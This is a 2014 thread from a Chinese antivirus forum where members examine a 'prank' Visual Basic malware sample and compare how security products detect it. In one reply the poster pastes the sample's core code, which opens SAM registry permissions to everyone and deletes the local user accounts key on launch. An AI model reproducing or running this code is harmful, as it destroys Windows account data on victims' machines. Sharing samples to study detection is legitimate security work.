楼主: 深山红叶__
收起左侧

[病毒样本] 坑爹恶作剧 满满都是API

  [复制链接]
545853507
头像被屏蔽
发表于 2014-6-14 23:24:56 | 显示全部楼层
bav  星星miss  ,在沙盘里运行了一下

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
深山红叶__
 楼主| 发表于 2014-6-14 23:26:02 | 显示全部楼层
依班娜 发表于 2014-6-14 23:19
他那是EQ
话说还是VB?
不放出源码?


VB
核心:
    lVal = RegOpenKeyEx(lKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)
    lVal = SHDeleteKey(lKey, sKeyName)
    RegCloseKey (hKey)
    BuildExplicitAccessWithName(ea, "EVERYONE", KEY_ALL_ACCESS, SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT)
    result = SetEntriesInAcl(1, ea, pOldDACL, pNewDACL)
    result = SetNamedSecurityInfo("MACHINE\SAM\SAM", 4&, 4&, 0&, 0&, pNewDACL, 0&)

form_load
DelKey HKEY_LOCAL_MACHINE, "SAM\SAM\Domains\Account\Users"
瓜g
发表于 2014-6-14 23:29:01 | 显示全部楼层
本帖最后由 瓜g 于 2014-6-14 23:34 编辑


时间事件结果附加信息
2014/6/14 23:25
系统内核加固阻止规则ID:131268623 防护类型:系统关机(应该也包括重启) 进程: 目标进程:
2014/6/14 23:25
木马防御自动处理api.exe规则ID:33557248 进程:C:\USERS\123\DESKTOP\API.EXE 相关文件:
2014/6/14 23:25
木马防御自动处理api.exe规则ID:33557248 进程:C:\USERS\123\DESKTOP\API.EXE 相关文件:

瓜g
发表于 2014-6-14 23:35:37 | 显示全部楼层
深山红叶__ 发表于 2014-6-14 23:15
为什么会有哈勃这种东西...看来我与社会脱节了?

腾讯新出的
勇者无敌
头像被屏蔽
发表于 2014-6-14 23:35:58 | 显示全部楼层
To Avira [#1687493]
深山红叶__
 楼主| 发表于 2014-6-14 23:37:08 | 显示全部楼层

完全不明真相,名字听起来挺厉害的
瓜g
发表于 2014-6-14 23:39:20 | 显示全部楼层
深山红叶__ 发表于 2014-6-14 23:37
完全不明真相,名字听起来挺厉害的

目前和火眼有一定差距,有些动作无法识别出来。。。
深山红叶__
 楼主| 发表于 2014-6-14 23:40:39 | 显示全部楼层
瓜g 发表于 2014-6-14 23:39
目前和火眼有一定差距,有些动作无法识别出来。。。

新出的都会坑一些,目测会搞好,不过tx...
依班娜
发表于 2014-6-14 23:43:45 | 显示全部楼层
本帖最后由 依班娜 于 2014-6-14 23:48 编辑
深山红叶__ 发表于 2014-6-14 23:26
VB
核心:
    lVal = RegOpenKeyEx(lKey, sKeyName, 0, KEY_ALL_ACCESS, hKey)


用记事本看了一下,然后百度了一下

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Qutianshang
发表于 2014-6-15 09:10:06 | 显示全部楼层
微点表示不用实验了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-18 08:51 , Processed in 0.121223 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表